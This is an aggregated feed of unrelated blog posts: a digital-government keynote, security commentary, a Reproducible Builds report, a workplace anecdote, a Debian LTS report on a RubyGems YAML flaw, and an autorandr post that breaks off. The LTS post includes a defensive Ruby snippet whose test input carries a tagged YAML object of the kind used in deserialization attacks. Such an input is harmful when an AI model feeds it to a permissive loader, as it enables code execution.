I was invited to an incredible and inaugural conference in Canada called FWD50 which was looking at the next 50 days, months and years for society. It had a digital government flavour to it but had participants and content from various international, national and sub-national governments, civil society, academia, industry and advocacy groups. The diversity of voices in the room was good and the organisers committed to greater diversity next year. I gave my keynote as an independent expert and my goal was to get people thinking bigger than websites and mobile apps, to dream about the sort of future we want as a society (as a species!) and work towards that. As part of my talk I also explored what the big paradigm shifts have happened (note the past tense) and potential roles for government (particularly the public sector) in a hyper connected, distributed network of powerful individuals. My slides are available here (simple though they are). It wasn’t recorded but I did an audio recording and transcribed. I was unwell and had lost my voice so this is probably better anyway :)

The tipping point and where do we go from here

I’ve been thinking a lot over many years about change and the difference between iteration and transformation, about systems, about what is going on in the big picture, because what I’m seeing around the world is a lot of people iterating away from pain but not actually iterating towards a future. Looking for ways to solve the current problem but not rethinking or reframing in the current context. I want to talk to you about the tipping point.

We invented all of this. This is worth taking a moment to think. We invented every system, every government, every means of production, we organised ourselves into structures and companies, all the things we know, we invented. By understanding we invented we can embrace the notion that we aren’t stuck with it. A lot of people start from the normative perspective that it is how it is and how do we improve it slightly but we don’t have to be constrained to assumption because *we* invented it. We can take a formative approach.

The reason this is important is because the world has fundamentally changed. The world has started from a lot of assumptions. This (slide) is a map of the world as it was known at the time, and it was known for a long time to be flat. And at some point it became known that the world was not flat and people had to change their perspective. If we don’t challenge those assumptions that underpin our systems, we run the significant risk of recreating the past with shiny new things. If we take whatever the shiny thing is today, like blockchain or social media 10 years ago, and take that shiny thing to do what we have always done, then how are we progressing? We are just “lifting and shifting” as they like to say, which as a technologist is almost the worst thing I can hear.

Actually understanding the assumptions that underpin what we do, understanding the goal that we have and what we are trying to achieve, and actually having to make sure that we intentionally choose to move forward with the assumptions that we want to take into the future is important because a lot of the biases and assumptions that underpin the systems that we have today were forged centuries or even millennia ago. A long time before the significant paradigm shifts we have seen.

So I’m going to talk a little bit about how things have changed. It’s not that the tipping point is happening. The tipping point has already happened. We have seen paradigm shifts with legacy systems of power and control. Individuals are more individually powerful than ever in the history of our species. If you think way back in hunter and gatherer times, everyone was individually pretty powerful then, but it didn’t scale. When we moved to cities we actually started to highly specialise and become interdependent and individually less powerful because we made these systems of control that were necessary to manage the surplus of resource, necessary to manage information. But what’s happened now through the independence movements creating a culture of everyone being individually powerful through individual worthy of rights, and then more recently with the internet becoming a distributor, enabler and catalyst of that, we are now seeing power massively distributed.

Think about it. Any individual around the world that can get online, admittedly that’s only two thirds of us but it’s growing every day, and everyone has the power to publish, to create, to share, to collaborate, to collude, to monitor. It’s not just the state monitoring the people but the people monitoring the state and people monitoring other people. There is the power to enforce your own perspective. And it doesn’t actually matter whether you think it’s a good or bad thing, it is the reality. It’s the shift. And if we don’t learn to embrace, understand and participate in it, particularly in government, then we actually make ourselves less relevant. Because one of the main things about this distribution of power, that the internet has taught us fundamentally as part of our culture that we have all started to adopt, is that you can route around damage. The internet was set up to be able to route around damage where damage was physical or technical. We started to internalise that socially and if you, in government, are seen to be damage, then people route around you. This is why we have to learn to work as a node in a network, not just a king in a castle, because kings don’t last anymore.

So which way is forward. The priority now needs to be deciding what sort of future do we want. Not what sort of past do we want to escape. The 21st century sees many communities emerging. They are hyper connected, transnational, multicultural, heavily interdependent, heavily specialised, rapidly changing and disconnected from their geopolitical roots. Some people see that as a reason to move away from having geopolitically formed states. Personally I believe there will always be a role for a geographic state because I need a way to scale a quality of life for my family along with my fellow citizens and neighbours. But what does that mean in an international sense. Are my rights as a human being being realised in a transnational sense. There are some really interesting questions about the needs of users beyond the individual services that we deliver, particularly when you look in a transnational way.

So a lot of these assumptions have become like a rusty anchor that kept us in place in high tide, but are drawing us to a dangerous reef as the water lowers. We need to figure out how to float on the water without rusty anchors to adapt to the tides of change.

There are a lot of pressures that are driving these changes of course. We are all feeling those pressures, those of us that are working in government. There’s the pressure of changing expectations, of history, from politics and the power shift. The pressure of the role of government in the 21st century. Pressure is a wonderful thing as it can be a catalyst of change, so we shouldn’t shy away from pressure, but recognising that we’re under pressure is important.

So let’s explore some of those power shifts and then what role could government play moving forward.

Paradigm #1: central to distributed. This is about that shift in power, the independence movements and the internet. It is something people talk about but don’t necessarily apply to their work. Governments will talk about wanting to take a more distributed approach but followup with setting up “my” website expecting everyone to join or do something. How about everyone come to “my” office or create “my” own lab. Distributed, when you start to really internalise what that means, is different. I was lucky as I forged a lot of my assumptions and habits of working when I was involved in the Open Source community, and the Open Source community has a lot of lessons for the rest of society because it is on the bleeding edge of a lot of these paradigm shifts. So working in a distributed way is to assume that you are not at the centre, to assume that you’re not needed. To assume that if you make yourself useful that people will rely on you, but also to assume that you rely on others and to build what you do in a way that strengthens the whole system. I like to talk about it as “Gov as a Platform”, sometimes that is confusing to people so let’s talk about it as “Gov as an enabler”. It’s not just government as a central command and controller anymore because the moment you create a choke point, people route around it. How do we become a government as an enabler of good things, and how can we use other mechanisms to create the controls in society. Rather than try to protect people from themselves, why not enable people to protect themselves. There are so many natural motivations in the community, in industry, in the broader sector that we serve, that we can tap into but traditionally we haven’t. Because traditionally we saw ourselves as the enforcer, as the one to many choke point. So working in a distributed way is not just about talking the talk, it’s about integrating it into the way we think.

Some other aspects of this include localised to globalised, keeping in mind that large multinational companies have become quite good at jurisdiction shopping for improvements of profits, which you can’t say is either a good or bad thing, it’s just a natural thing and how they’re naturally motivated. But citizens are increasingly starting to jurisdiction shop too. So I would suggest a role for government in the 21st century would be to create the best possible quality of life for people, because then you’ll attract the best from around the world.

The second part of central to distributed is simple to complex. I have this curve (on the slide) which shows green as complexity and red as government’s response to user needs. The green climbs exponentially whilst the red is pretty linear, with small increases or decreases over time, but not an exponential response by any means. Individual needs are no longer heavily localised. They are subject to local, national, transnational complexities with every extra complexity compounded, not linear. So the increasing complexities in people’s lives, and the obligations, taxation, services and entitlements, everything is going up. So there is a delta forming between what government can directly do, and what people need. So again I contend that the opportunity here particularly for the public sector is to actually be an enabler for all those service intermediaries – the for profit, non profit, civic tech – to help them help themselves, help them help their customers, by merit of making government a platform upon which they can build. We’ve had a habit and a history of creating public infrastructure, particularly in Australia, in New Zealand, in Canada, we’ve been very good at building public infrastructure. Why have we not focused on digital infrastructure? Why do we see digital infrastructure as something that has to be cost recovered to be sustainable when we don’t have to do cost recovery for every public road. I think that looking at the cost benefits and value creation of digital public infrastructure needs to be looked at in the same way, and we need to start investing in digital public infrastructure.

Next paradigm shift, analog to digital, or slow to very fast. I like to joke that we use lawyers as modems. If you think about regulation and policy, we write it, it is translated by a lawyer or drafter into regulation or policy, it is then translated by a lawyer or drafter or anyone into operational systems, business systems, helpdesk systems or other systems in society. Why wouldn’t we make our regulation as code? The intent of our regulation and our legislative regimes available to be directly consumed (by the systems) so that we can actually speed up, automate, improve consistency of application through the system, and have a feedback loop to understand whether policy changes are having the intended policy effect.

There are so many great things we can do when we start thinking about digital as something new, not just digitising an analog process. Innovation too long was interpreted as a digitisation of a process, basic process improvements. But real digitisation should be a transformation where you are changing the thing to better achieve the purpose or intent.

The next paradigm is scarcity to surplus. I think this is critical. We have a lot of assumptions in our systems that assume scarcity. Why do we still have so many of our systems assume scarcity when surplus is the opportunity. Between 3D printing and nanotech, we could be deconstructing and reconstructing new materials to print into goods and food and yet a large inhibitor of 3D printing progress is copyright. So the question I have for you is do we care more about an 18th century business model or do we care about solving the problems of our society. We need to make these choices. If we have moved to an era of surplus but we are getting increasing inequality, perhaps the systems of distribution are problematic? Perhaps in assuming scarcity we are protecting scarcity for the few at the cost of the many.

Next paradigm is normative to formative, “please comply”. For the last hundred years in particular we have perfected the art of broadcasting images of normal into our houses, particularly with radio and television. We have the concept of set a standard or rule and if you don’t follow we’ll punish you, so a lot of culture is about compliance in society. Compliance is important for stability, but blind compliance can create millstones. A formative paradigm is about not saying how it is but in exploring where you want to go. In the public service we are particularly good at compliance culture but I suggest that if we got more people thinking formatively, not just change for changes sake, but bringing people together on their genuinely shared purpose of serving the public, then we might be able to take a more formative approach to doing the work we do for the betterment of society rather than ticking the box because it is the process we have to follow. Formative takes us away from being consumers and towards being makers. As an example, the most basic form of normative human behaviour is in how we see and conform to being human. You are either normal, or you are not, based on some externally projected vision of normal. But the internet has shown us that no one is normal. So embracing that it is through our difference we are more powerful and able to adapt is an important part of our story and culture moving forward. If we are confident to be formative, we can always try to create a better world whilst applying a critical eye to compliance so we don’t comply for compliance sake.

Now on the back of these paradigm shifts, I’d like to talk briefly about the future. I spoke about the opportunity through surplus with 3D printing and nanotech to address poverty and hunger. What about the opportunities of rockets for domestic travel? It takes half an hour to get into space, an hour to traverse the world and half an hour down, which means domestic retail transport by rocket is being developed right now, which means I could go from New Zealand to Canada to work for the day and be home for tea. That shift is going to be enormous in so many ways and it could drive real changes in how we see work and internationalism. How many people remember Total Recall? The right hand picture is a self driving car from a movie in the 90s and is becoming normal now. Interesting fact: some of the car designs will tint the windows when they go through intersections because the passengers are deeply uncomfortable with the speed and closeness of self driving cars, which can miss each other very narrowly compared to human driving. Obviously there are opportunities around AI, bots and automation, but I think where it gets interesting is when we think about the opportunities of the future of work. We are still working on industrial assumptions that the number of hours that we have is a scarcity paradigm and I have to sell the number of hours that I work, 40, 50, 60 hours. Why wouldn’t we work 20 hours a week at a higher rate to meet our basic needs? Why wouldn’t we have 1 or 2 days a week where we could contribute to our civic duties, or art, or education? Perhaps we could jump start an inclusive renaissance, and I don’t mean cat pictures. People can’t thrive if they’re struggling to survive and yet we keep putting pressure on people just to survive. Again, we are from countries with quite strong safety nets but even those safety nets put huge pressure, paperwork and bureaucracy on our most vulnerable just to meet their basic needs.
Often the process of getting access to the services and entitlements is so hard and traumatic that they can’t, so how do we close that gap so all our citizens can move from survival to thriving?

The last picture is a bit cheeky. The science fiction author William Gibson wrote Johnny Mnemonic and has a character in that book called Jones, a cyborg dolphin used to sniff out underwater mines in warfare. Very dark, but the interesting concept there is in how Jones was received after the war: “he was more than a dolphin, but from another dolphin’s point of view he might have seemed like something less.” What does it mean to be human? If I lose a leg, right now it is assumed I need to replace that leg to be somehow “whole”. What if I want 4 legs? The human brain is able to adapt to new input. I knew a woman who got a small sphere filled with mercury and a free floating magnet in her finger, and the magnet spins according to frequency, and she found over a short period of time she was able to detect changes in frequency. Why is that cool and interesting? Because the brain can adapt to foreign, non evolved input. I think that is mind blowing. We have the opportunity to augment ourselves, not just to conform to normal or be slightly better, faster humans. We can actually change what it means to be human altogether. I think this will be one of the next big social challenges for society, but because we are naturally so attracted to “shiny”, I think that discomfort will pass within a couple of generations. One prediction is that the normal Olympics has become boring and that we will move into a transhuman olympics where we take the leash off and explore the 100m sprint with rockets, or judo with cyborgs. Where the interest goes, the sponsorship goes, and more professional athletes compete. And what’s going to happen if your child says they want to be a professional transhuman olympian and that they will add wings or remove their legs for their professional career, to add them (or not) later? That’s a bit scary for many but at the same time, it’s very interesting.
And it’s ok to be uncomfortable, it’s ok to look at change, be uncomfortable and ask yourself “why am I uncomfortable?” rather than just pushing back on discomfort. It’s critical more than ever, particularly in the public service that we get away from this dualistic good or bad, in or out, yours or mine and start embracing the grey.

So what’s the role of government in all this, in the future. Again these are just some thoughts, a conversation starter.

I think one of our roles is to ensure that individuals have the ability to thrive. Now I acknowledge I’m very privileged to have come from a social libertarian country that believes this, where people broadly believe they want their taxes to go to the betterment of society, and not all countries have that assumption. But if we accept the idea that people can’t thrive if they can’t survive, then our baseline quality of life, if you assume an individual starts from nothing with no privilege, benefits or family, provided by the state, needs to be good enough for the person to be able to thrive. Otherwise we get a basic structural problem. Part of that is becoming master builders again, and to go to the Rawls example from Alistair before, we need empathy in what we do in government. The number of times we build systems without empathy and they go terribly wrong because we didn’t think about what it would be like to be on the other side of that service, policy or idea. User centred design is just a systematisation of empathy, which is fantastic, but bringing empathy into everything we do is very important.

Leadership is a very important role for government. I think part of our role is to represent the best interests of society. I very strongly feel that we have a natural role to serve the public in the public sector, as distinct from the political sector (though citizens see us as the same thing). The role of a strong, independent public sector is more important than ever in a post facts “fake news” world because it is one of the only actors on the stage that is naturally motivated, naturally systemically motivated, to serve the best interests of the public. That’s why open government is so important and that’s why digital and open government initiatives align directly.

Because open without digital doesn’t scale, and digital without open doesn’t last.

Stability, predictability and balance. It is certainly a role of government to create confidence in our communities; confidence creates thriving. It is one thing to address Maslow’s pyramid of needs, but if you don’t feel confident, if you don’t feel safe, then you still end up behaving in strange and unpredictable ways. So this is part of what is needed for communities to thrive. This relates to regulation and there is a theory that regulation is bad because it is hard. I would suggest that regulation is important for the stability and predictability in society but we have to change the way we deliver it. Regulation as code gets the balance right because you can have the settings and levers in the economy but also the ability for it to be automated, consumable, consistent, monitored and innovative. I imagine a future where I have a personal AI which I can trust because of quantum cryptography and because it is tethered in purpose to my best interests. I don’t have to rely on whether my interests happen to align with the purpose of a department, company or non-profit to get the services I need because my personal bot can figure out what I need and give me the options for me to make decisions about my life. It could deal with the Government AI to figure out the rules, my taxation, obligations, services and entitlements. Where is the website in all that? I ask this because the web was a 1990s paradigm, and we need more people to realise and plan around the idea that the future of service delivery is in building the backend of what we do – the business rules, transactions, data, content, models – in a modular, consumable way so we can shift channels or modes of delivery whether it is a person, digital service or AI to AI interaction.

Another role of government is in driving the skills we need for the 21st century. Coding is critical not because everyone needs to code (maybe they will) but more than that coding teaches you an assumption, an instinct, that technology is something that can be used by you, not something you are intrinsically bound to. Minecraft is the saviour of a generation because all those kids are growing up believing they can shape the world around them, not have to be shaped by the world around them. This harks back to the normative/formative shift. But we also need to teach critical thinking, teach self awareness, bias awareness, maker skills, community awareness. It has been delightful to move to New Zealand where they have a culture that has an assumed community awareness.

We need of course to have a strong focus on participatory democracy, where government isn’t just doing something to you but we are all building the future we need together. This is how we create a multi-processor world rather than a single processor government. This is how we scale and develop a better society but we need to move beyond “consultation” and into actual co-design with governments working collaboratively across the sectors and with civil society to shape the world.

I’ll finish on this note, government as an enabler, a platform upon which society can build. We need to build a way of working that assumes we are a node in the network, that assumes we have to work collaboratively, that assumes that people are naturally motivated to make good decisions for their life and how can government enable and support people.

So embrace the tipping point, don’t just react. What future do you want, what society do you want to move towards? I guess I’ve got to a point in my life where I see everything as a system and if I can’t connect the dots between what I’m doing and the purpose then I try to not do that thing. The first public service job I had I got in and automated a large proportion of the work within a couple of weeks and then asked for data.gov.au, and they gave it to me because I was motivated to make it better.

So I challenge you to be thinking about this every day, to consider your own assumptions and biases, to consider whether you are being normative or formative, to evaluate whether you are being iterative or transformative, to evaluate whether you are moving away from something or towards something. And to always keep in mind where you want to be, how you are contributing to a better society and to actively leave behind those legacy ideas that simply don’t serve us anymore.


LongNow: Danny Hillis publishes new essay on Long-Term Timekeeping in the Clock of the Long Now

Danny Hillis, Long Now co-founder and designer of the 10,000 Year Clock, has a new essay, “Long-Term Timekeeping in the Clock of the Long Now” in the book The Science of Time 2016: Time in Astronomy & Society, Past, Present and Future (published November 02017). The Science of Time 2016 presents “information on the science and history of time and its impact on sciences, cultures, religions, and future developments in the field:”

The uses of time in astronomy – from pointing telescopes, coordinating and processing observations, predicting ephemerides, cultures, religious practices, history, businesses, determining Earth orientation, analyzing time-series data and in many other ways – represent a broad sample of how time is used throughout human society and in space. Time and its reciprocal, frequency, is the most accurately measurable quantity and often an important path to the frontiers of science. But the future of timekeeping is changing with the development of optical frequency standards and the resulting challenges of distributing time at ever higher precision, with the possibility of timescales based on pulsars, and with the inclusion of higher-order relativistic effects. The definition of the second will likely be changed before the end of this decade, and its realization will increase in accuracy; the definition of the day is no longer obvious. The variability of the Earth’s rotation presents challenges of understanding and prediction.

In this symposium speakers took a closer look at time in astronomy, other sciences, cultures, and business as a defining element of modern civilization. The symposium aimed to set the stage for future timekeeping standards, infrastructure, and engineering best practices for astronomers and the broader society. At the same time the program was cognizant of the rich history from Harrison’s chronometer to today’s atomic clocks and pulsar observations. The theoreticians and engineers of time were brought together with the educators and historians of science, enriching the understanding of time among both experts and the public.

The book can be purchased here. (Hillis’ individual chapter in the book is also available for purchase.)

Sociological Images: When Home is Where the Hazards Are

Where is your nearest garbage dump? Where does the local factory go when it needs to get rid of some particularly toxic chemicals? If there was a disaster, would you have to move? Could you?

Sociologists use shorthand terms like “environmental racism” to draw attention to the fact that poor communities and communities of color are often more likely to be exposed to hazardous materials, and cases like the Flint water crisis drive this point home.

Of course, housing inequality also means that nobody has to dump anything to put poor communities in hazardous positions. One recent example of this is the flooding in Houston after Hurricane Harvey. Over at Socius, Yuqi Lu gathered data on the median household income in neighborhoods across the Houston area from the American Community Survey and matched it with land elevation data from Google Maps.

In general, poorer neighborhoods in Houston sit at lower elevations, and thus are more susceptible to flood risks. This relationship is strongest in less-densely-populated areas, such as rural and suburban neighborhoods, but additional analysis in Lu’s article shows the relationship is robust.

The latest reports are in on human caused climate change. Regardless of whether we can act to turn it around in time, we’ll also have to recognize the fact that not everyone faces the same fallout from environmental hazards and natural disasters.

Evan Stewart is a Ph.D. candidate in sociology at the University of Minnesota. You can follow him on Twitter.

(View original at https://thesocietypages.org/socimages)

Cory Doctorow: How I lifehacked my way into a corner

My latest Locus column is “How to Do Everything (Lifehacking Considered Harmful),” the story of how I was present at the birth of “lifehacking” and how, by diligently applying the precept that I should always actively choose how I prioritize my time, I have painted my way into a (generally pleasant) corner that I can’t escape from.


Call it the paradox of mindful choosing: after 14 years of throwing away the things that do the least for me and preserving those things that do the most for me, I’ve pulled all the easy blocks out of my life’s Jenga tower, and I’ve left myself with no moves to make.


The past 14 years have regularly featured junctures where I had to get rid of something I liked doing so I could do something I liked doing more. Some of that was low-hanging fruit (I haven’t watched TV regularly in more than a decade), but after getting rid of the empty calories in my activity diet, I had to start making hard choices.

In retrospect, I observe that the biggest predictor of whether an activity survived winnowing is whether it paid off in two or more of the aspects of my life and career. If something made me a better blogger – but not a bet­ter novelist and activist – it went. The more parts of my life were implicated in an activity, the more likely I was to keep the activity in my daily round.

Some of these choices were tough. I have all but given up on re-reading books, despite the undeniable pleasure and value to understanding the authors’ craft, which is easier to unpick on subsequent readings. But I have more than 20 linear feet of books I’ve promised to read for blurbs and reviews, and reading those books also teaches me something about the craft, also brings me pleasure, also makes me a better reviewer, and also makes me a better citizen of science fiction, who contributes to the success of worthy new books.

Some social media tools – like Facebook – make for fun (if problematic) socializing, and all social media pays some dividend to authors who are hoping to sell books and activists who are hoping to win support, but Twitter also teaches me to be a better writer by making me think about brevity and sentence structure in very rigorous ways (and from an activist perspective, Twitter is a better choice because it, unlike Facebook, doesn’t want the web to die and be replaced by its walled garden) – so Twitter is in, and Facebook is out.

There are some unexpected outcomes from this process, albeit ones that are obvious in hindsight.

How to Do Everything (Lifehacking Considered Harmful) [Cory Doctorow/Locus]

Cryptogram: Daphne Caruana Galizia's Murder and the Security of WhatsApp

Daphne Caruana Galizia was a Maltese journalist whose anti-corruption investigations exposed powerful people. She was murdered in October by a car bomb.

Galizia used WhatsApp to communicate securely with her sources. Now that she is dead, the Maltese police want to break into her phone or the app, and find out who those sources were.

One journalist reports:

Part of Daphne's destroyed smart phone was elevated from the scene.

Investigators say that Caruana Galizia had not taken her laptop with her on that particular trip. If she had done so, the forensic experts would have found evidence on the ground.

Her mobile phone is also being examined, as can be seen from her WhatsApp profile, which has registered activity since the murder. But it is understood that the data is safe.

Sources close to the newsroom said that as part of the investigation her SIM card has been cloned. This is done with the help of mobile service providers in similar cases. Asked if her WhatsApp messages or any other messages that were stored in her phone will be retrieved, the source said that since the messaging application is encrypted, the messages cannot be seen. Therefore it is unlikely that any data can be retrieved.

I am less optimistic than that reporter. The FBI is providing "specific assistance." The article doesn't explain that, but I would not be surprised if they were helping crack the phone.

It will be interesting to see if WhatsApp's security survives this. My guess is that it depends on how much of the phone was recovered from the bombed car.

EDITED TO ADD (11/7): The court-appointed IT expert on the case has a criminal record in the UK for theft and forgery.

Planet Debian: Reproducible builds folks: Reproducible Builds: Weekly report #132

Here's what happened in the Reproducible Builds effort between Sunday October 29 and Saturday November 4 2017:

Past events

  • From October 31st — November 2nd we held the 3rd Reproducible Builds summit in Berlin, Germany. A full, in-depth report will be posted in the next week or so.

Upcoming events

  • On November 8th Jonathan Bustillos Osornio (jathan) will present at CubaConf Havana.

  • On November 17th Chris Lamb will present at Open Compliance Summit, Yokohama, Japan on how reproducible builds ensure the long-term sustainability of technology infrastructure.

Reproducible work in other projects

Packages reviewed and fixed, and bugs filed

Reviews of unreproducible packages

7 package reviews have been added, 43 have been updated and 47 have been removed in this week, adding to our knowledge about identified issues.

Weekly QA work

During our reproducibility testing, FTBFS bugs have been detected and reported by:

  • Adrian Bunk (44)
  • Andreas Moog (1)
  • Lucas Nussbaum (7)
  • Steve Langasek (1)

Documentation updates

diffoscope development

Version 88 was uploaded to unstable by Mattia Rizzolo. It included contributions (already covered by posts of the previous weeks) from:

  • Mattia Rizzolo
    • tests/comparators/dtb: compatibility with version 1.4.5. (Closes: #880279)
  • Chris Lamb
    • comparators:
      • binwalk: improve names in output of "internal" members. #877525
      • Omit misleading "any of" prefix when only complaining about one module in ImportError messages.
    • Don't crash on malformed "md5sums" files. (Closes: #877473)
    • tests/comparators:
      • ps: ps2ascii > 9.21 now varies on timezone, so skip this test for now.
      • dtb: only parse the version number, not any "-dirty" suffix.
    • debian/watch: Use HTTPS URI.
  • Ximin Luo
    • comparators:
      • utils/file: Diff container metadata centrally. This fixes a last remaining bug in fuzzy-matching across containers. (Closes: #797759)
      • Fix all the affected comparators after the above change.
  • Holger Levsen
    • Bump Standards-Version to 4.1.1, no changes needed.

strip-nondeterminism development

Version 0.040-1 was uploaded to unstable by Mattia Rizzolo. It included contributions already covered by posts of the previous weeks, as well as new ones from:


Version 0.5.2-2 was uploaded to unstable by Holger Levsen.

It included contributions already covered by posts of the previous weeks, as well as new ones from:

reprotest development

buildinfo.debian.net development

tests.reproducible-builds.org

  • Mattia Rizzolo:
    • archlinux: enable schroot building on pb4 as well
    • archlinux: don't install the deprecated abs tool
    • archlinux: try to re-enable one schroot creation job
  • lynxis
    • lede: replace TMPDIR -> RESULTSDIR
    • lede: openwrt_get_banner(): use locals instead of globals
    • lede: add newline to $CONFIG
    • lede: show git log -1 in jenkins log
  • Holger Levsen:
    • lede: add very simple landing page
  • Juliana Oliveira Rodrigues
    • archlinux: adds pacman-git dependencies
  • kpcyrd
    • archlinux: disable signature verification when running in the future
    • archlinux: use pacman-git until the next release
    • archlinux: make pacman fail less early
    • archlinux: use sudo to prepare chroot
    • archlinux: remove -rf for regular file
    • archlinux: avoid possible TOCTOU issue
    • archlinux: Try to fix tar extraction
    • archlinux: fix sha1sums parsing

Misc.

This week's edition was written by Bernhard M. Wiedemann, Chris Lamb, Mattia Rizzolo & reviewed by a bunch of Reproducible Builds folks on IRC & the mailing lists.

Worse Than Failure: Replacement Trainwreck


There's an old saying about experience in IT: Some people have 10 years of experience, and some have 1 year 10 times. Every day, someone learns the hard way how true this statement really is.

Raquel returned from holiday, only to get a call from above saying her contract would not be renewed, giving her 2 weeks' notice to find a new placement. The boss explained it was a budget thing, since contractors are often more expensive than salaried employees, especially ones working remotely in the Asia-Pacific region. C'est la vie.

Raquel's big project was a perl module to talk to a high-end but aging storage system. The hardware had no API, and the CLI was arcane, with wildly inconsistent formats in the command output. Raquel abstracted that all away to give a programmatic interface for the other developers. The downside of this approach was that every time they put out a firmware update, she had to modify the perl script to match the changes. The module had grown to 1600 lines of code through 400+ commits in the 3 years she'd been working there. The other developers would include this as a git submodule so they could pull in changes in an automated way and re-release their tooling.

Raquel was asked to hand off the module to John, who assured her he knew git really well and enough perl to figure things out. It seemed reasonable ... at first. She got John set up with another, smaller tool she'd written: a plugin for a popular monitoring system to read the storage drives. It used the library she'd written as a backend, so she figured it'd give him some understanding of the functionality. Since some of their customers used Windows, she taught him how to compile to an executable. Once John was compiled and running, Raquel sent him to their lab environment to test the plugin.

A few hours later, she got her first bit of bad news: the plugin was failing, and John didn't know why. He attached the error message:

SSH connection to 192.168.1.10 (22/TCP) failed after 1 attempt(s).

Now, the library used SSH to connect to the drive, so Raquel's first suggestion was to make sure John could SSH into the storage system from the host he was working on. Things went quiet after that, so she figured he'd sorted it out—likely a loose cable or a disabled Ethernet driver—and went on with her day.

The next day, however, she came in to a more urgent message: John was still having problems. She asked for more details, and this was all she got:

SSH connection to 192.168.1.10 (22/TCP) failed after 1 attempt(s).

Maybe he forgot what he was doing? Raquel reminded John about checking the connection, and he replied that he could SSH just fine from the machine.

Weird.... She fired up a WebEx call so she could see what was going on in the lab. Sure enough, John could SSH from that machine to the storage device ... but he was running the plugin on his laptop. He was genuinely puzzled why that mattered.

Over the next half hour, Raquel dug up a network architecture diagram to show how only the lab machines could talk to the lab storage devices. Finally, still confused, John agreed to just do his development on the machines in the lab and they hung up.

That afternoon, Raquel's favorite type of ticket came in: a nice easy feature add for the monitoring program. It'd require a new method in the library and a handler for the Nagios plugin; it was perfect for John to get his feet wet. She assigned it to him and attached a link to a method in the library that was about 97% similar to what was needed, for him to study (read: copy and paste).

Several days slipped past in silence. Since there'd been no commits, Raquel dropped John a note to say that her contract was almost up. If he wanted a code review, he should push his changes and let her know.

John replied that the code was "almost complete" and would be checked in "shortly."

Fair enough, Raquel figured, and let it go.

Her second-to-last day, John sent a note saying he'd checked in his changes. He also included a link—to a different git repo.

Maybe it's a fork? No such luck. It was a brand new repo with exactly 1 commit. Not only had John made a new repo, that repo contained both the library code and the Nagios plugin code, with no submodules in sight.

Raquel could hardly believe it. How am I supposed to review without a diff?

She set up another WebEx for early the next morning—her last day—and explained to John how the lack of history was a critical problem. He agreed with her and assured her she'd get the diff she wanted.

Now what, dear reader, do you think Raquel actually received? If you guessed an email with bullet points outlining "At line 75 in foo.pl, I changed A to B. At line 89 I changed C to D ...", you're today's lucky winner.

Glancing at the clock, Raquel decided she had time for one last good deed before departing forever. She ran diff on the 2 repos, then typed up a polite, precise email outlining her comments. John's code wasn't all that bad really; he needed to code more defensively, since the storage system would sometimes throw errors, and he probably shouldn't loop over output that would always be exactly 0 or 1 lines of code, but it functioned well enough. Oh yeah, and the big chunk in the middle of the original method that he'd elected not to copy over? That handled the fact that the storage system was a cluster, so you may not be on the host you want when you first SSH into the machine. But otherwise, it was decent code.

Raquel's final email arrived soon after that, from John's manager. Apparently, John had complained that she was unprofessional.

She wrote back to wish them both the best of luck, collected her things, and laughed her way home.


Planet Debian: Lucas Kanashiro: My Debian LTS work in October

In this post I describe the work that I’ve done until the end of October in the context of the Debian LTS team. This month I was allocated 5h and spent just 2h of them because I was writing my master’s qualification text (I am almost at my deadline to finish it). During November I intend to finish these 3h pending, so I did not request more hours.

I basically worked on CVE-2017-0903, which is an issue related to YAML deserialization of gem specifications that could allow one to execute remote code. Two packages in wheezy could be affected by this security vulnerability, rubygems and ruby1.9.1. The issue affects just the RubyGems source code, but before Ruby version 1.9.1 it was maintained in a separate package; after that it was incorporated into the ruby interpreter source package.

After carefully reading the upstream blogpost and reviewing the commit that introduced this vulnerability, I was able to figure out whether the mentioned packages were affected or not. The modification was not present in either of them, and after some tests I confirmed that those versions of rubygems were not affected. The two packages were marked as not affected by CVE-2017-0903 in wheezy.
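To illustrate the bug class behind CVE-2017-0903 from the defender's side, here is an added example that is not part of this post or of RubyGems: it parses constructed, gemspec-like YAML with Psych.safe_load and an allow-list of classes, so a tagged Ruby object or an alias embedded in untrusted metadata is rejected before anything is instantiated. The sample documents and the permitted-class list are my own (not the ones RubyGems uses), and the keyword form of safe_load assumes Ruby 2.6 or later.

```ruby
require 'psych'

# Constructed sample: a benign, gemspec-like metadata document (not a real gem).
BENIGN_METADATA = <<~YAML
  name: example-gem
  version: "1.2.3"
  authors:
    - Example Author
  summary: A constructed sample gem specification
YAML

# Constructed sample: same shape, but one value carries a Ruby object tag.
# A permissive loader would build an instance of the named class while parsing,
# which with untrusted input is the deserialization hazard behind the CVE.
TAGGED_METADATA = <<~YAML
  name: example-gem
  version: "1.2.3"
  extra: !ruby/object:Object {}
YAML

# Constructed sample: a document using an anchor/alias, which safe_load also
# refuses when aliases are disabled (aliases are a classic resource-exhaustion vector).
ALIASED_METADATA = <<~YAML
  authors: &people
    - Example Author
  maintainers: *people
YAML

# Allow-list for untrusted gem metadata. Illustrative choice, not RubyGems' list;
# the point is that no class outside it is ever created by the parser.
PERMITTED_CLASSES = [Symbol].freeze

# Parse untrusted metadata with an allow-list instead of a permissive loader.
# Psych.safe_load raises before instantiating anything not in PERMITTED_CLASSES.
def load_untrusted_metadata(yaml_text)
  Psych.safe_load(yaml_text, permitted_classes: PERMITTED_CLASSES, aliases: false)
end

# Returns [:ok, parsed_hash] or [:rejected, reason] so a caller can log and skip
# the offending metadata rather than crash.
def check_metadata(yaml_text)
  [:ok, load_untrusted_metadata(yaml_text)]
rescue Psych::DisallowedClass, Psych::BadAlias, Psych::SyntaxError => e
  [:rejected, e.class.name]
end

if $PROGRAM_NAME == __FILE__
  { benign: BENIGN_METADATA, tagged: TAGGED_METADATA, aliased: ALIASED_METADATA }.each do |label, doc|
    status, detail = check_metadata(doc)
    puts "#{label}: #{status} (#{status == :ok ? detail['name'] : detail})"
  end
end
```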

Well, this was the summary of my activities in the Debian LTS team in October. See you next month :)

Planet Debian: Don Armstrong: Autorandr: automatically adjust screen layout

Like many laptop users, I often plug my laptop into different monitor setups (multiple monitors at my desk, projector when presenting, etc.) Running xrandr commands or clicking through interfaces gets tedious, and writing scripts isn't much better.

Recently, I ran across autorandr, which detects attached monitors using EDID (and other settings), saves xrandr configurations, and restores them. It can also run arbitrary scripts when a particular configuration is loaded. I've packaged it, and it is currently waiting in NEW. If you can't wait, the deb is here and the git repo is here.

To use it, simply install the package, and create your initial configuration (in my case, undocked):

 autorandr --save undocked

then, dock your laptop (or plug in your external monitor(s)), change the configuration using xrandr (or whatever you use), and save your new configuration (in my case, workstation):
